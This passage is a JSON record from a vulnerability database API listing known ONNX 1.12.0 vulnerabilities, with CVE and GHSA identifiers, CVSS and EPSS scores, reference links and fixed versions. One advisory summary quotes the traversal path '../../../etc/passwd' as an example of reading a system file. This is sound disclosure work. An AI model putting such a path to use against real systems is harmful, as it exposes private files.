Package Instance
Look up vulnerable packages by Package URL.
GET /api/packages/30128?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/30128?format=api", "purl": "pkg:pypi/onnx@1.12.0", "type": "pypi", "namespace": "", "name": "onnx", "version": "1.12.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "1.21.0", "latest_non_vulnerable_version": "1.21.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/329544?format=api", "vulnerability_id": "VCID-1fsj-5v28-tbfj", "summary": "", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34446.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34446.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34446", "reference_id": "", "reference_type": "", "scores": [ { "value": "4e-05", "scoring_system": "epss", "scoring_elements": "0.00163", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34446" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 
"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:10:29Z/" } ], "url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:10:29Z/" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34446", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34446" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132607", "reference_id": "1132607", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132607" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2454371", "reference_id": "2454371", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2454371" }, { "reference_url": "https://github.com/advisories/GHSA-cmw6-hcpp-c6jp", "reference_id": "GHSA-cmw6-hcpp-c6jp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cmw6-hcpp-c6jp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": 
"pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "CVE-2026-34446", "GHSA-cmw6-hcpp-c6jp" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1fsj-5v28-tbfj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/8697?format=api", "vulnerability_id": "VCID-4p7r-z14t-9uav", "summary": "Versions of the package onnx before 1.13.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory, for example \"../../../etc/passwd\"", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-25882", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.05827", "scoring_system": "epss", "scoring_elements": "0.90675", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-25882" }, { "reference_url": "https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": 
"", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129" }, { "reference_url": "https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 
"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d" }, { "reference_url": "https://github.com/onnx/onnx/issues/3991", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://github.com/onnx/onnx/issues/3991" }, { "reference_url": "https://github.com/onnx/onnx/pull/4400", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://github.com/onnx/onnx/pull/4400" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2023-38.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", 
"scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2023-38.yaml" }, { "reference_url": "https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25882", "reference_id": "CVE-2022-25882", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25882" }, { "reference_url": "https://github.com/advisories/GHSA-ffxj-547x-5j7c", "reference_id": "GHSA-ffxj-547x-5j7c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ffxj-547x-5j7c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/30129?format=api", "purl": 
"pkg:pypi/onnx@1.13.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-acaz-q7jr-r3g9" }, { "vulnerability": "VCID-g8xb-18u2-6qbe" }, { "vulnerability": "VCID-gc3c-f7yt-nkc1" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.13.0" } ], "aliases": [ "CVE-2022-25882", "GHSA-ffxj-547x-5j7c", "PYSEC-2023-38" ], "risk_score": 0.1, "exploitability": "0.5", "weighted_severity": "0.1", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4p7r-z14t-9uav" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9594?format=api", "vulnerability_id": "VCID-5319-x8g7-qbew", "summary": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, a symlink traversal vulnerability in external data loading allows reading files outside the model directory. 
This issue has been patched in version 1.21.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34447", "reference_id": "", "reference_type": "", "scores": [ { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00261", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34447" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:14:28Z/" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34447", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34447" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132608", "reference_id": "1132608", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132608" }, { "reference_url": 
"https://github.com/advisories/GHSA-p433-9wv8-28xj", "reference_id": "GHSA-p433-9wv8-28xj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p433-9wv8-28xj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "CVE-2026-34447", "GHSA-p433-9wv8-28xj", "PYSEC-2026-104" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5319-x8g7-qbew" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9069?format=api", "vulnerability_id": "VCID-acaz-q7jr-r3g9", "summary": "Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory. 
The vulnerability occurs as a bypass for the patch added for CVE-2022-25882.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27318", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00408", "scoring_system": "epss", "scoring_elements": "0.61435", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27318" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/" } ], "url": "https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-222.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-222.yaml" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY", "reference_id": "", "reference_type": "", "scores": [ { 
"value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/" } ], "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/" }, { "reference_url": "https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/" } ], "url": "https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27318", "reference_id": "CVE-2024-27318", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27318" }, { "reference_url": "https://github.com/advisories/GHSA-whh8-fjgc-qp73", "reference_id": "GHSA-whh8-fjgc-qp73", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-whh8-fjgc-qp73" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39078?format=api", "purl": "pkg:pypi/onnx@1.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-gc3c-f7yt-nkc1" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.0" } ], "aliases": [ "CVE-2024-27318", "GHSA-whh8-fjgc-qp73", 
"PYSEC-2024-222" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-acaz-q7jr-r3g9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9068?format=api", "vulnerability_id": "VCID-g8xb-18u2-6qbe", "summary": "Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as the ONNX_ASSERT and ONNX_ASSERTM functions have an off by one string copy.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27319", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24802", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27319" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/" } ], "url": "https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-223.yaml", "reference_id": "", 
"reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-223.yaml" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": 
"" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27319", "reference_id": "CVE-2024-27319", "reference_type": "", "scores": [ { "value": "4.4", 